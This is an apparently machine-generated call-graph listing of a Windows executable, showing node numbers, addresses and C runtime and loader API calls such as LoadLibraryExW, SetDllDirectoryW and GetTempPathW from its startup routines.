20513 7ff6aba68f42 HeapReAlloc 20513->20514 20513->20516 20514->20168 20515->20514 20516->20512 20516->20513 20517 7ff6aba64800 _get_daylight 2 API calls 20516->20517 20517->20516 20519 7ff6aba5ff7c __crtLCMapStringW 5 API calls 20518->20519 20520 7ff6aba601b0 20519->20520 20520->20173 20522 7ff6aba564b6 20521->20522 20523 7ff6aba56492 20521->20523 20524 7ff6aba564bb 20522->20524 20525 7ff6aba56510 20522->20525 20526 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20523->20526 20530 7ff6aba564a1 20523->20530 20528 7ff6aba564d0 20524->20528 20524->20530 20531 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20524->20531 20527 7ff6aba60b10 _fread_nolock MultiByteToWideChar 20525->20527 20526->20530 20536 7ff6aba5652c 20527->20536 20532 7ff6aba5e6c4 _fread_nolock 12 API calls 20528->20532 20529 7ff6aba56533 GetLastError 20533 7ff6aba55dbc _fread_nolock 11 API calls 20529->20533 20530->20176 20530->20177 20531->20528 20532->20530 20535 7ff6aba56540 20533->20535 20534 7ff6aba5656e 20534->20530 20538 7ff6aba60b10 _fread_nolock MultiByteToWideChar 20534->20538 20540 7ff6aba55e48 _get_daylight 11 API calls 20535->20540 20536->20529 20536->20534 20537 7ff6aba56561 20536->20537 20541 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20536->20541 20542 7ff6aba5e6c4 _fread_nolock 12 API calls 20537->20542 20539 7ff6aba565b2 20538->20539 20539->20529 20539->20530 20540->20530 20541->20537 20542->20534 20544 7ff6aba69da1 __crtLCMapStringW 20543->20544 20545 7ff6aba6835e 20544->20545 20546 7ff6aba601d4 6 API calls 20544->20546 20545->20231 20545->20232 20546->20545 19929 7ff6aba5a899 19930 7ff6aba5b358 45 API calls 19929->19930 19931 7ff6aba5a89e 19930->19931 19932 7ff6aba5a8c5 GetModuleHandleW 19931->19932 19933 7ff6aba5a90f 19931->19933 19932->19933 19939 7ff6aba5a8d2 19932->19939 19941 7ff6aba5a79c 19933->19941 19939->19933 19955 7ff6aba5a9c0 GetModuleHandleExW 19939->19955 19961 7ff6aba61548 EnterCriticalSection 19941->19961 19956 7ff6aba5aa1d 19955->19956 19957 7ff6aba5a9f4 GetProcAddress 19955->19957 19959 7ff6aba5aa29 19956->19959 19960 7ff6aba5aa22 FreeLibrary 19956->19960 19958 7ff6aba5aa06 19957->19958 19958->19956 19959->19933 19960->19959 20660 7ff6aba4b0a0 20661 7ff6aba4b0ce 20660->20661 20662 7ff6aba4b0b5 20660->20662 20662->20661 20664 7ff6aba5e6c4 12 API calls 20662->20664 20663 7ff6aba4b12e 20664->20663 20880 7ff6aba62920 20891 7ff6aba68654 20880->20891 20892 7ff6aba68661 20891->20892 20893 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20892->20893 20894 7ff6aba6867d 20892->20894 20893->20892 20895 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20894->20895 20896 7ff6aba62929 20894->20896 20895->20894 20897 7ff6aba61548 EnterCriticalSection 20896->20897 20905 7ff6aba4c110 20906 7ff6aba4c120 20905->20906 20922 7ff6aba5aae0 20906->20922 20908 7ff6aba4c12c 20928 7ff6aba4c418 20908->20928 20910 7ff6aba4c6fc 7 API calls 20912 7ff6aba4c1c5 20910->20912 20911 7ff6aba4c144 _RTC_Initialize 20920 7ff6aba4c199 20911->20920 20933 7ff6aba4c5c8 20911->20933 20914 7ff6aba4c159 20936 7ff6aba59f50 20914->20936 20920->20910 20921 7ff6aba4c1b5 20920->20921 20923 7ff6aba5aaf1 20922->20923 20924 7ff6aba55e48 _get_daylight 11 API calls 20923->20924 20927 7ff6aba5aaf9 20923->20927 20925 7ff6aba5ab08 20924->20925 20926 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 20925->20926 20926->20927 20927->20908 20929 7ff6aba4c429 20928->20929 20932 7ff6aba4c42e __scrt_acquire_startup_lock 20928->20932 20930 7ff6aba4c6fc 7 API calls 20929->20930 20929->20932 20931 7ff6aba4c4a2 20930->20931 20932->20911 20961 7ff6aba4c58c 20933->20961 20935 7ff6aba4c5d1 20935->20914 20937 7ff6aba59f70 20936->20937 20959 7ff6aba4c165 20936->20959 20938 7ff6aba59f78 20937->20938 20939 7ff6aba59f8e GetModuleFileNameW 20937->20939 20940 7ff6aba55e48 _get_daylight 11 API calls 20938->20940 20943 7ff6aba59fb9 20939->20943 20941 7ff6aba59f7d 20940->20941 20942 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 20941->20942 20942->20959 20944 7ff6aba59ef0 11 API calls 20943->20944 20945 7ff6aba59ff9 20944->20945 20946 7ff6aba5a001 20945->20946 20951 7ff6aba5a019 20945->20951 20947 7ff6aba55e48 _get_daylight 11 API calls 20946->20947 20948 7ff6aba5a006 20947->20948 20949 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20948->20949 20949->20959 20950 7ff6aba5a03b 20952 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20950->20952 20951->20950 20953 7ff6aba5a067 20951->20953 20954 7ff6aba5a080 20951->20954 20952->20959 20955 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20953->20955 20956 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20954->20956 20957 7ff6aba5a070 20955->20957 20956->20950 20958 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20957->20958 20958->20959 20959->20920 20960 7ff6aba4c69c InitializeSListHead 20959->20960 20962 7ff6aba4c5a6 20961->20962 20963 7ff6aba4c59f 20961->20963 20965 7ff6aba5b16c 20962->20965 20963->20935 20968 7ff6aba5ada8 20965->20968 20975 7ff6aba61548 EnterCriticalSection 20968->20975 16909 7ff6aba4c1fc 16930 7ff6aba4c3dc 16909->16930 16912 7ff6aba4c21d __scrt_acquire_startup_lock 16915 7ff6aba4c35d 16912->16915 16921 7ff6aba4c23b __scrt_release_startup_lock 16912->16921 16913 7ff6aba4c353 17097 7ff6aba4c6fc IsProcessorFeaturePresent 16913->17097 16916 7ff6aba4c6fc 7 API calls 16915->16916 16918 7ff6aba4c368 __FrameHandler3::FrameUnwindToEmptyState 16916->16918 16917 7ff6aba4c260 16919 7ff6aba4c2e6 16938 7ff6aba5a6b8 16919->16938 16921->16917 16921->16919 17086 7ff6aba5aa64 16921->17086 16923 7ff6aba4c2eb 16944 7ff6aba41000 16923->16944 16927 7ff6aba4c30f 16927->16918 17093 7ff6aba4c560 16927->17093 16931 7ff6aba4c3e4 16930->16931 16932 7ff6aba4c3f0 __scrt_dllmain_crt_thread_attach 16931->16932 16933 7ff6aba4c3fd 16932->16933 16934 7ff6aba4c215 16932->16934 17104 7ff6aba5b30c 16933->17104 16934->16912 16934->16913 16939 7ff6aba5a6c8 16938->16939 16942 7ff6aba5a6dd 16938->16942 16939->16942 17147 7ff6aba5a148 16939->17147 16942->16923 16945 7ff6aba42b80 16944->16945 17346 7ff6aba563c0 16945->17346 16947 7ff6aba42bbc 17353 7ff6aba42a70 16947->17353 16951 7ff6aba4bb10 _log10_special 8 API calls 16953 7ff6aba430ec 16951->16953 17091 7ff6aba4c84c GetModuleHandleW 16953->17091 16954 7ff6aba42bfd 17520 7ff6aba41c60 16954->17520 16955 7ff6aba42cdb 17529 7ff6aba439d0 16955->17529 16959 7ff6aba42c1c 17425 7ff6aba47e70 16959->17425 16960 7ff6aba42d2a 17552 7ff6aba41e50 16960->17552 16964 7ff6aba42c4f 16971 7ff6aba42c7b __std_exception_copy 16964->16971 17524 7ff6aba47fe0 16964->17524 16965 7ff6aba42d1d 16966 7ff6aba42d45 16965->16966 16967 7ff6aba42d22 16965->16967 16970 7ff6aba41c60 49 API calls 16966->16970 17548 7ff6aba4f5a4 16967->17548 16972 7ff6aba42d64 16970->16972 16973 7ff6aba47e70 14 API calls 16971->16973 16981 7ff6aba42c9e __std_exception_copy 16971->16981 16976 7ff6aba41930 115 API calls 16972->16976 16973->16981 16974 7ff6aba47f80 40 API calls 16975 7ff6aba42dcc 16974->16975 16977 7ff6aba47fe0 40 API calls 16975->16977 16978 7ff6aba42d8e 16976->16978 16979 7ff6aba42dd8 16977->16979 16978->16959 16980 7ff6aba42d9e 16978->16980 16982 7ff6aba47fe0 40 API calls 16979->16982 16983 7ff6aba41e50 81 API calls 16980->16983 16981->16974 16986 7ff6aba42cce __std_exception_copy 16981->16986 16984 7ff6aba42de4 16982->16984 17076 7ff6aba42bc9 __std_exception_copy 16983->17076 16985 7ff6aba47fe0 40 API calls 16984->16985 16985->16986 16987 7ff6aba47e70 14 API calls 16986->16987 16988 7ff6aba42e04 16987->16988 16989 7ff6aba42ef9 16988->16989 16990 7ff6aba42e29 __std_exception_copy 16988->16990 16991 7ff6aba41e50 81 API calls 16989->16991 17001 7ff6aba42e6c 16990->17001 17438 7ff6aba47f80 16990->17438 16991->17076 16993 7ff6aba4303a 16996 7ff6aba47e70 14 API calls 16993->16996 16994 7ff6aba43033 17563 7ff6aba485b0 16994->17563 16998 7ff6aba4304f __std_exception_copy 16996->16998 16999 7ff6aba43187 16998->16999 17000 7ff6aba4308a 16998->17000 17570 7ff6aba438f0 16999->17570 17002 7ff6aba4311a 17000->17002 17003 7ff6aba43094 17000->17003 17001->16993 17001->16994 17007 7ff6aba47e70 14 API calls 17002->17007 17445 7ff6aba485c0 17003->17445 17005 7ff6aba43195 17009 7ff6aba431b7 17005->17009 17010 7ff6aba431ab 17005->17010 17008 7ff6aba43126 17007->17008 17012 7ff6aba430a5 17008->17012 17015 7ff6aba43133 17008->17015 17014 7ff6aba41c60 49 API calls 17009->17014 17573 7ff6aba43a40 17010->17573 17017 7ff6aba41e50 81 API calls 17012->17017 17024 7ff6aba4310e __std_exception_copy 17014->17024 17018 7ff6aba41c60 49 API calls 17015->17018 17017->17076 17021 7ff6aba43151 17018->17021 17019 7ff6aba4320a 17495 7ff6aba48950 17019->17495 17023 7ff6aba43158 17021->17023 17021->17024 17027 7ff6aba41e50 81 API calls 17023->17027 17024->17019 17025 7ff6aba431ed SetDllDirectoryW LoadLibraryExW 17024->17025 17025->17019 17026 7ff6aba4321d SetDllDirectoryW 17029 7ff6aba43250 17026->17029 17074 7ff6aba432a1 17026->17074 17027->17076 17030 7ff6aba47e70 14 API calls 17029->17030 17038 7ff6aba4325c __std_exception_copy 17030->17038 17031 7ff6aba43433 17032 7ff6aba4343e 17031->17032 17039 7ff6aba43445 17031->17039 17034 7ff6aba485b0 5 API calls 17032->17034 17033 7ff6aba43362 17500 7ff6aba42780 17033->17500 17036 7ff6aba43443 17034->17036 17036->17039 17041 7ff6aba43339 17038->17041 17045 7ff6aba43295 17038->17045 17650 7ff6aba42720 17039->17650 17044 7ff6aba47f80 40 API calls 17041->17044 17044->17074 17045->17074 17576 7ff6aba46200 17045->17576 17074->17031 17074->17033 17076->16951 17087 7ff6aba5aa7b 17086->17087 17088 7ff6aba5aa9c 17086->17088 17087->16919 19826 7ff6aba5b358 17088->19826 17092 7ff6aba4c85d 17091->17092 17092->16927 17095 7ff6aba4c571 17093->17095 17094 7ff6aba4c326 17094->16917 17095->17094 17096 7ff6aba4ce18 7 API calls 17095->17096 17096->17094 17098 7ff6aba4c722 _isindst memcpy_s 17097->17098 17099 7ff6aba4c741 RtlCaptureContext RtlLookupFunctionEntry 17098->17099 17100 7ff6aba4c76a RtlVirtualUnwind 17099->17100 17101 7ff6aba4c7a6 memcpy_s 17099->17101 17100->17101 17102 7ff6aba4c7d8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17101->17102 17103 7ff6aba4c826 _isindst 17102->17103 17103->16915 17105 7ff6aba6471c 17104->17105 17106 7ff6aba4c402 17105->17106 17114 7ff6aba5d420 17105->17114 17106->16934 17108 7ff6aba4ce18 17106->17108 17109 7ff6aba4ce2a 17108->17109 17110 7ff6aba4ce20 17108->17110 17109->16934 17126 7ff6aba4d1b4 17110->17126 17125 7ff6aba61548 EnterCriticalSection 17114->17125 17127 7ff6aba4d1c3 17126->17127 17128 7ff6aba4ce25 17126->17128 17134 7ff6aba4d3f0 17127->17134 17130 7ff6aba4d220 17128->17130 17131 7ff6aba4d24b 17130->17131 17132 7ff6aba4d22e DeleteCriticalSection 17131->17132 17133 7ff6aba4d24f 17131->17133 17132->17131 17133->17109 17138 7ff6aba4d258 17134->17138 17139 7ff6aba4d342 TlsFree 17138->17139 17144 7ff6aba4d29c __vcrt_InitializeCriticalSectionEx 17138->17144 17140 7ff6aba4d2ca LoadLibraryExW 17142 7ff6aba4d2eb GetLastError 17140->17142 17143 7ff6aba4d369 17140->17143 17141 7ff6aba4d389 GetProcAddress 17141->17139 17142->17144 17143->17141 17145 7ff6aba4d380 FreeLibrary 17143->17145 17144->17139 17144->17140 17144->17141 17146 7ff6aba4d30d LoadLibraryExW 17144->17146 17145->17141 17146->17143 17146->17144 17148 7ff6aba5a161 17147->17148 17155 7ff6aba5a15d 17147->17155 17168 7ff6aba63cac GetEnvironmentStringsW 17148->17168 17151 7ff6aba5a17a 17181 7ff6aba5a2c8 17151->17181 17152 7ff6aba5a16e 17175 7ff6aba5b464 17152->17175 17155->16942 17160 7ff6aba5a508 17155->17160 17157 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17158 7ff6aba5a1a1 17157->17158 17159 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17158->17159 17159->17155 17161 7ff6aba5a52b 17160->17161 17166 7ff6aba5a542 17160->17166 17161->16942 17162 7ff6aba5fe04 _get_daylight 11 API calls 17162->17166 17163 7ff6aba5a5b6 17165 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17163->17165 17164 7ff6aba60b10 MultiByteToWideChar _fread_nolock 17164->17166 17165->17161 17166->17161 17166->17162 17166->17163 17166->17164 17167 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17166->17167 17167->17166 17169 7ff6aba5a166 17168->17169 17170 7ff6aba63cd0 17168->17170 17169->17151 17169->17152 17200 7ff6aba5e6c4 17170->17200 17172 7ff6aba63d07 memcpy_s 17173 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17172->17173 17174 7ff6aba63d27 FreeEnvironmentStringsW 17173->17174 17174->17169 17176 7ff6aba5b469 RtlFreeHeap 17175->17176 17177 7ff6aba5b498 17175->17177 17176->17177 17178 7ff6aba5b484 GetLastError 17176->17178 17177->17155 17179 7ff6aba5b491 Concurrency::details::SchedulerProxy::DeleteThis 17178->17179 17180 7ff6aba55e48 _get_daylight 9 API calls 17179->17180 17180->17177 17182 7ff6aba5a2f0 17181->17182 17183 7ff6aba5fe04 _get_daylight 11 API calls 17182->17183 17195 7ff6aba5a32b 17183->17195 17184 7ff6aba5a333 17185 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17184->17185 17187 7ff6aba5a182 17185->17187 17186 7ff6aba5a3ad 17188 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17186->17188 17187->17157 17188->17187 17189 7ff6aba5fe04 _get_daylight 11 API calls 17189->17195 17190 7ff6aba5a39c 17271 7ff6aba5a3e4 17190->17271 17194 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17194->17184 17195->17184 17195->17186 17195->17189 17195->17190 17196 7ff6aba5a3d0 17195->17196 17198 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17195->17198 17262 7ff6aba616e4 17195->17262 17277 7ff6aba5b844 IsProcessorFeaturePresent 17196->17277 17198->17195 17201 7ff6aba5e70f 17200->17201 17205 7ff6aba5e6d3 _get_daylight 17200->17205 17210 7ff6aba55e48 17201->17210 17203 7ff6aba5e6f6 HeapAlloc 17204 7ff6aba5e70d 17203->17204 17203->17205 17204->17172 17205->17201 17205->17203 17207 7ff6aba64800 17205->17207 17213 7ff6aba64840 17207->17213 17219 7ff6aba5c1c8 GetLastError 17210->17219 17212 7ff6aba55e51 17212->17204 17218 7ff6aba61548 EnterCriticalSection 17213->17218 17220 7ff6aba5c209 FlsSetValue 17219->17220 17223 7ff6aba5c1ec 17219->17223 17221 7ff6aba5c21b 17220->17221 17222 7ff6aba5c1f9 SetLastError 17220->17222 17236 7ff6aba5fe04 17221->17236 17222->17212 17223->17220 17223->17222 17227 7ff6aba5c248 FlsSetValue 17230 7ff6aba5c266 17227->17230 17231 7ff6aba5c254 FlsSetValue 17227->17231 17228 7ff6aba5c238 FlsSetValue 17229 7ff6aba5c241 17228->17229 17232 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 17229->17232 17243 7ff6aba5bdfc 17230->17243 17231->17229 17232->17222 17241 7ff6aba5fe15 _get_daylight 17236->17241 17237 7ff6aba5fe66 17240 7ff6aba55e48 _get_daylight 10 API calls 17237->17240 17238 7ff6aba5fe4a HeapAlloc 17239 7ff6aba5c22a 17238->17239 17238->17241 17239->17227 17239->17228 17240->17239 17241->17237 17241->17238 17242 7ff6aba64800 _get_daylight 2 API calls 17241->17242 17242->17241 17248 7ff6aba5bcd4 17243->17248 17260 7ff6aba61548 EnterCriticalSection 17248->17260 17263 7ff6aba616fb 17262->17263 17264 7ff6aba616f1 17262->17264 17265 7ff6aba55e48 _get_daylight 11 API calls 17263->17265 17264->17263 17269 7ff6aba61717 17264->17269 17266 7ff6aba61703 17265->17266 17281 7ff6aba5b824 17266->17281 17268 7ff6aba6170f 17268->17195 17269->17268 17270 7ff6aba55e48 _get_daylight 11 API calls 17269->17270 17270->17266 17275 7ff6aba5a3e9 17271->17275 17276 7ff6aba5a3a4 17271->17276 17272 7ff6aba5a412 17274 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17272->17274 17273 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17273->17275 17274->17276 17275->17272 17275->17273 17276->17194 17278 7ff6aba5b857 17277->17278 17324 7ff6aba5b558 17278->17324 17284 7ff6aba5b6bc 17281->17284 17283 7ff6aba5b83d 17283->17268 17285 7ff6aba5b6e7 17284->17285 17288 7ff6aba5b758 17285->17288 17287 7ff6aba5b70e 17287->17283 17298 7ff6aba5b4a0 17288->17298 17293 7ff6aba5b793 17293->17287 17294 7ff6aba5b844 _isindst 17 API calls 17295 7ff6aba5b823 17294->17295 17296 7ff6aba5b6bc _invalid_parameter_noinfo 37 API calls 17295->17296 17297 7ff6aba5b83d 17296->17297 17297->17287 17299 7ff6aba5b4bc GetLastError 17298->17299 17300 7ff6aba5b4f7 17298->17300 17301 7ff6aba5b4cc 17299->17301 17300->17293 17304 7ff6aba5b50c 17300->17304 17307 7ff6aba5c290 17301->17307 17305 7ff6aba5b528 GetLastError SetLastError 17304->17305 17306 7ff6aba5b540 17304->17306 17305->17306 17306->17293 17306->17294 17308 7ff6aba5c2ca FlsSetValue 17307->17308 17309 7ff6aba5c2af FlsGetValue 17307->17309 17310 7ff6aba5c2d7 17308->17310 17312 7ff6aba5b4e7 SetLastError 17308->17312 17311 7ff6aba5c2c4 17309->17311 17309->17312 17313 7ff6aba5fe04 _get_daylight 11 API calls 17310->17313 17311->17308 17312->17300 17314 7ff6aba5c2e6 17313->17314 17315 7ff6aba5c304 FlsSetValue 17314->17315 17316 7ff6aba5c2f4 FlsSetValue 17314->17316 17318 7ff6aba5c322 17315->17318 17319 7ff6aba5c310 FlsSetValue 17315->17319 17317 7ff6aba5c2fd 17316->17317 17320 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17317->17320 17321 7ff6aba5bdfc _get_daylight 11 API calls 17318->17321 17319->17317 17320->17312 17322 7ff6aba5c32a 17321->17322 17323 7ff6aba5b464 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17322->17323 17323->17312 17325 7ff6aba5b592 _isindst memcpy_s 17324->17325 17326 7ff6aba5b5ba RtlCaptureContext RtlLookupFunctionEntry 17325->17326 17327 7ff6aba5b62a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17326->17327 17328 7ff6aba5b5f4 RtlVirtualUnwind 17326->17328 17331 7ff6aba5b67c _isindst 17327->17331 17328->17327 17332 7ff6aba4bb10 17331->17332 17333 7ff6aba4bb19 17332->17333 17334 7ff6aba4bea0 IsProcessorFeaturePresent 17333->17334 17335 7ff6aba4bb24 GetCurrentProcess TerminateProcess 17333->17335 17336 7ff6aba4beb8 17334->17336 17341 7ff6aba4c098 RtlCaptureContext 17336->17341 17342 7ff6aba4c0b2 RtlLookupFunctionEntry 17341->17342 17343 7ff6aba4c0c8 RtlVirtualUnwind 17342->17343 17344 7ff6aba4becb 17342->17344 17343->17342 17343->17344 17345 7ff6aba4be60 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17344->17345 17349 7ff6aba606f0 17346->17349 17347 7ff6aba60743 17348 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 17347->17348 17350 7ff6aba6076c 17348->17350 17349->17347 17351 7ff6aba60796 17349->17351 17350->16947 17663 7ff6aba605c8 17351->17663 17671 7ff6aba4be10 17353->17671 17356 7ff6aba42aab GetLastError 17678 7ff6aba42310 17356->17678 17357 7ff6aba42ad0 17673 7ff6aba48840 FindFirstFileExW 17357->17673 17361 7ff6aba42b3d 17708 7ff6aba48a00 17361->17708 17362 7ff6aba42ae3 17695 7ff6aba488c0 CreateFileW 17362->17695 17364 7ff6aba4bb10 _log10_special 8 API calls 17366 7ff6aba42b75 17364->17366 17366->17076 17375 7ff6aba41930 17366->17375 17368 7ff6aba42b0c __vcrt_InitializeCriticalSectionEx 17368->17361 17369 7ff6aba42af4 17698 7ff6aba41f30 17369->17698 17370 7ff6aba42b4b 17371 7ff6aba42ac6 17370->17371 17373 7ff6aba41f30 78 API calls 17370->17373 17371->17364 17373->17371 17376 7ff6aba439d0 108 API calls 17375->17376 17377 7ff6aba41965 17376->17377 17378 7ff6aba41c23 17377->17378 17379 7ff6aba473d0 83 API calls 17377->17379 17380 7ff6aba4bb10 _log10_special 8 API calls 17378->17380 17381 7ff6aba419ab 17379->17381 17382 7ff6aba41c3e 17380->17382 17424 7ff6aba419e3 17381->17424 18122 7ff6aba4fc2c 17381->18122 17382->16954 17382->16955 17384 7ff6aba4f5a4 74 API calls 17384->17378 17385 7ff6aba419c5 17386 7ff6aba419c9 17385->17386 17387 7ff6aba419e8 17385->17387 17388 7ff6aba55e48 _get_daylight 11 API calls 17386->17388 18126 7ff6aba4f8f4 17387->18126 17390 7ff6aba419ce 17388->17390 18129 7ff6aba42020 17390->18129 17393 7ff6aba41a06 17395 7ff6aba55e48 _get_daylight 11 API calls 17393->17395 17394 7ff6aba41a25 17398 7ff6aba41a3c 17394->17398 17399 7ff6aba41a5b 17394->17399 17396 7ff6aba41a0b 17395->17396 17397 7ff6aba42020 87 API calls 17396->17397 17397->17424 17400 7ff6aba55e48 _get_daylight 11 API calls 17398->17400 17401 7ff6aba41c60 49 API calls 17399->17401 17402 7ff6aba41a41 17400->17402 17403 7ff6aba41a72 17401->17403 17404 7ff6aba42020 87 API calls 17402->17404 17405 7ff6aba41c60 49 API calls 17403->17405 17404->17424 17406 7ff6aba41abd 17405->17406 17407 7ff6aba4fc2c 73 API calls 17406->17407 17408 7ff6aba41ae1 17407->17408 17409 7ff6aba41af6 17408->17409 17410 7ff6aba41b15 17408->17410 17411 7ff6aba55e48 _get_daylight 11 API calls 17409->17411 17412 7ff6aba4f8f4 _fread_nolock 53 API calls 17410->17412 17413 7ff6aba41afb 17411->17413 17414 7ff6aba41b2a 17412->17414 17415 7ff6aba42020 87 API calls 17413->17415 17416 7ff6aba41b30 17414->17416 17417 7ff6aba41b4f 17414->17417 17415->17424 17419 7ff6aba55e48 _get_daylight 11 API calls 17416->17419 18144 7ff6aba4f668 17417->18144 17421 7ff6aba41b35 17419->17421 17422 7ff6aba42020 87 API calls 17421->17422 17422->17424 17423 7ff6aba41e50 81 API calls 17423->17424 17424->17384 17426 7ff6aba47e7a 17425->17426 17427 7ff6aba48950 2 API calls 17426->17427 17428 7ff6aba47e99 GetEnvironmentVariableW 17427->17428 17429 7ff6aba47eb6 ExpandEnvironmentStringsW 17428->17429 17430 7ff6aba47f02 17428->17430 17429->17430 17431 7ff6aba47ed8 17429->17431 17432 7ff6aba4bb10 _log10_special 8 API calls 17430->17432 17434 7ff6aba48a00 2 API calls 17431->17434 17433 7ff6aba47f14 17432->17433 17433->16964 17435 7ff6aba47eea 17434->17435 17436 7ff6aba4bb10 _log10_special 8 API calls 17435->17436 17437 7ff6aba47efa 17436->17437 17437->16964 17439 7ff6aba48950 2 API calls 17438->17439 17440 7ff6aba47f9c 17439->17440 17441 7ff6aba48950 2 API calls 17440->17441 17442 7ff6aba47fac 17441->17442 18408 7ff6aba59174 17442->18408 17444 7ff6aba47fba __std_exception_copy 17444->17001 17446 7ff6aba485d5 17445->17446 18426 7ff6aba47bb0 GetCurrentProcess OpenProcessToken 17446->18426 17449 7ff6aba47bb0 7 API calls 17450 7ff6aba48601 17449->17450 17451 7ff6aba4861a 17450->17451 17452 7ff6aba48634 17450->17452 17454 7ff6aba41d50 48 API calls 17451->17454 17453 7ff6aba41d50 48 API calls 17452->17453 17455 7ff6aba48647 LocalFree LocalFree 17453->17455 17456 7ff6aba48632 17454->17456 17457 7ff6aba48663 17455->17457 17459 7ff6aba4866f 17455->17459 17456->17455 18436 7ff6aba42220 17457->18436 17460 7ff6aba4bb10 _log10_special 8 API calls 17459->17460 17461 7ff6aba43099 17460->17461 17461->17012 17462 7ff6aba47ca0 17461->17462 17463 7ff6aba47cb8 17462->17463 17464 7ff6aba47cdc 17463->17464 17465 7ff6aba47d3a GetTempPathW GetCurrentProcessId 17463->17465 17466 7ff6aba47e70 14 API calls 17464->17466 18447 7ff6aba48760 17465->18447 17468 7ff6aba47ce8 17466->17468 18454 7ff6aba47610 17468->18454 17474 7ff6aba47d68 __std_exception_copy 17482 7ff6aba47da5 __std_exception_copy 17474->17482 18451 7ff6aba59aa4 17474->18451 17496 7ff6aba48972 MultiByteToWideChar 17495->17496 17497 7ff6aba48996 17495->17497 17496->17497 17499 7ff6aba489ac __std_exception_copy 17496->17499 17498 7ff6aba489b3 MultiByteToWideChar 17497->17498 17497->17499 17498->17499 17499->17026 17512 7ff6aba4278e memcpy_s 17500->17512 17501 7ff6aba4bb10 _log10_special 8 API calls 17502 7ff6aba42a24 17501->17502 17502->17076 17519 7ff6aba48590 LocalFree 17502->17519 17503 7ff6aba42987 17503->17501 17505 7ff6aba41c60 49 API calls 17505->17512 17506 7ff6aba429a2 17508 7ff6aba41e50 81 API calls 17506->17508 17508->17503 17511 7ff6aba42989 17514 7ff6aba41e50 81 API calls 17511->17514 17512->17503 17512->17505 17512->17506 17512->17511 17513 7ff6aba42140 81 API calls 17512->17513 17517 7ff6aba42990 17512->17517 18718 7ff6aba43970 17512->18718 18724 7ff6aba47260 17512->18724 18735 7ff6aba415e0 17512->18735 18783 7ff6aba46560 17512->18783 18787 7ff6aba435a0 17512->18787 18831 7ff6aba43860 17512->18831 17513->17512 17514->17503 17518 7ff6aba41e50 81 API calls 17517->17518 17518->17503 17521 7ff6aba41c85 17520->17521 17522 7ff6aba558c4 49 API calls 17521->17522 17523 7ff6aba41ca8 17522->17523 17523->16959 17525 7ff6aba48950 2 API calls 17524->17525 17526 7ff6aba47ff4 17525->17526 17527 7ff6aba59174 38 API calls 17526->17527 17528 7ff6aba48006 __std_exception_copy 17527->17528 17528->16971 17530 7ff6aba439dc 17529->17530 17531 7ff6aba48950 2 API calls 17530->17531 17532 7ff6aba43a04 17531->17532 17533 7ff6aba48950 2 API calls 17532->17533 17534 7ff6aba43a17 17533->17534 19014 7ff6aba56f54 17534->19014 17537 7ff6aba4bb10 _log10_special 8 API calls 17538 7ff6aba42ceb 17537->17538 17538->16960 17539 7ff6aba473d0 17538->17539 17540 7ff6aba473f4 17539->17540 17541 7ff6aba4fc2c 73 API calls 17540->17541 17546 7ff6aba474cb __std_exception_copy 17540->17546 17542 7ff6aba47410 17541->17542 17542->17546 19405 7ff6aba58804 17542->19405 17544 7ff6aba4fc2c 73 API calls 17547 7ff6aba47425 17544->17547 17545 7ff6aba4f8f4 _fread_nolock 53 API calls 17545->17547 17546->16965 17547->17544 17547->17545 17547->17546 17549 7ff6aba4f5d4 17548->17549 19420 7ff6aba4f380 17549->19420 17551 7ff6aba4f5ed 17551->16960 17553 7ff6aba4be10 17552->17553 17554 7ff6aba41e74 GetCurrentProcessId 17553->17554 17555 7ff6aba41c60 49 API calls 17554->17555 17556 7ff6aba41ec5 17555->17556 17557 7ff6aba558c4 49 API calls 17556->17557 17558 7ff6aba41f02 17557->17558 17559 7ff6aba41cc0 80 API calls 17558->17559 17560 7ff6aba41f0c 17559->17560 17561 7ff6aba4bb10 _log10_special 8 API calls 17560->17561 17562 7ff6aba41f1c 17561->17562 17562->17076 17564 7ff6aba48510 GetConsoleWindow 17563->17564 17565 7ff6aba4852a GetCurrentProcessId GetWindowThreadProcessId 17564->17565 17566 7ff6aba43038 17564->17566 17565->17566 17567 7ff6aba48549 17565->17567 17566->16993 17567->17566 17568 7ff6aba48551 ShowWindow 17567->17568 17568->17566 17569 7ff6aba48560 Sleep 17568->17569 17569->17566 17569->17568 17571 7ff6aba41c60 49 API calls 17570->17571 17572 7ff6aba4390d 17571->17572 17572->17005 17574 7ff6aba41c60 49 API calls 17573->17574 17575 7ff6aba43a70 17574->17575 